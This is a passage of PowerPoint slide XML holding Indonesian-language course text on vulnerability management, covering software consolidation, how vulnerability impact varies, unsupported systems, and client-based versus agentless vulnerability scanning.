              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsolidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bervariasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PDF Adobe versus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> workstation; yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Didukung</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vendornya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kecuali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Klien versus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Agen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penemuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
